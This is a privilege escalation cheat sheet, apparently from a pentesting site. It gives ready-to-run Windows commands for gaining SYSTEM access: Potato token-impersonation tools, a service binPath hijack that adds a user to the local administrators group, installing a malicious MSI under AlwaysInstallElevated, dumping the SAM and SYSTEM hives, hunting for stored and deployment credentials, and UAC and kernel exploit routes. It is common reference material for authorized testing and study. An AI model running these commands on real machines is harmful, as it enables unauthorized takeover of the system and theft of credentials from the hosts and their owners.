privesc

Windows Privilege Escalation

Manual Windows privilege escalation — enumeration, token/Potato attacks (PrintSpoofer/GodPotato), service misconfigurations, AlwaysInstallElevated, credential hunting, UAC bypasses, kernel exploits and scheduled-task/autorun hijacks.

Jun 2026, lazyhackers
Enumeration (5)
whoami /all
Groups + privileges + integrity level in one shot
enum baseline
whoami /priv
List token privileges (look for SeImpersonate/SeBackup/SeDebug)
enum token
systeminfo; wmic qfe get HotFixID
OS build + installed patches (feed to wesng/watson)
enum patches
net user; net localgroup administrators
Local users and who is admin
enum users
powershell -ep bypass -c "IEX(...);Invoke-AllChecks"
PowerUp automated misconfig checks
enum powerup
Token Privileges (Potato) (4)
PrintSpoofer.exe -i -c cmd
SeImpersonate → SYSTEM via the spooler named pipe
seimpersonate printspoofer
GodPotato -cmd "cmd /c whoami"
Modern SeImpersonate → SYSTEM (DCOM/RPC)
seimpersonate godpotato
JuicyPotatoNG.exe -t * -p cmd.exe
SeImpersonate → SYSTEM on older builds
seimpersonate juicypotato
SeBackupPrivilege -> reg save hklm\sam sam; reg save hklm\system system
Dump SAM/SYSTEM with backup rights
sebackup sam
Service Misconfigurations (4)
wmic service get name,pathname,startmode | findstr /i "auto" | findstr /i /v "c:\windows\\" | findstr /i /v """
Find auto-start services whose path is unquoted and outside C:\Windows (the last findstr must use /v to exclude already-quoted paths)
service unquoted
accesschk.exe -uwcqv "Everyone" * /accepteula
Find services your user can modify
service accesschk
sc config <svc> binpath= "cmd /c net localgroup administrators user /add"
Hijack a weak-permission service binPath
service binpath
writable service .exe -> replace it, then restart the service
DLL/binary hijack of a service
service hijack
Registry & AlwaysInstallElevated (3)
reg query HKLM\Software\Policies\Microsoft\Windows\Installer /v AlwaysInstallElevated; reg query HKCU\Software\Policies\Microsoft\Windows\Installer /v AlwaysInstallElevated
If the value is 1 in both hives (HKLM and HKCU) → any MSI installs as SYSTEM
registry aie
msiexec /quiet /qn /i evil.msi
Run the malicious MSI (AlwaysInstallElevated)
aie msi
reg query "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon"
Autologon credentials in the registry
registry creds
Credential Hunting (4)
cmdkey /list -> runas /savecred /user:admin cmd
Reuse stored credentials without knowing them
creds runas
findstr /si password *.xml *.ini *.txt *.config
Grep the filesystem for passwords
creds findstr
type C:\Windows\Panther\Unattend.xml
Deployment files often hold local-admin creds
creds unattend
GPP cPassword in SYSVOL (Groups.xml)
MS14-025 — decryptable domain creds
creds gpp
UAC Bypass & Kernel (4)
fodhelper.exe registry UAC bypass
Elevate from a medium-integrity admin without a prompt
uac fodhelper
eventvwr.exe / sdclt UAC bypass
Alternate auto-elevate bypasses
uac
systeminfo | wesng / watson
Map missing patches to kernel exploits
kernel patches
PrintNightmare (CVE-2021-1675/34527)
Spooler RCE/LPE
kernel printnightmare
Scheduled Tasks & Autoruns (3)
schtasks /query /fo LIST /v | findstr /i /c:"TaskName" /c:"Task To Run" /c:"Run As User"
Find tasks running as a higher-priv user (use /c: so each phrase matches whole; a bare quoted list makes findstr match on every single word)
schtask enum
writable task binary -> replace it before it runs
Hijack a scheduled-task executable
schtask hijack
autorunsc.exe -a * -accepteula
Enumerate all autostart entries (Sysinternals)
autoruns enum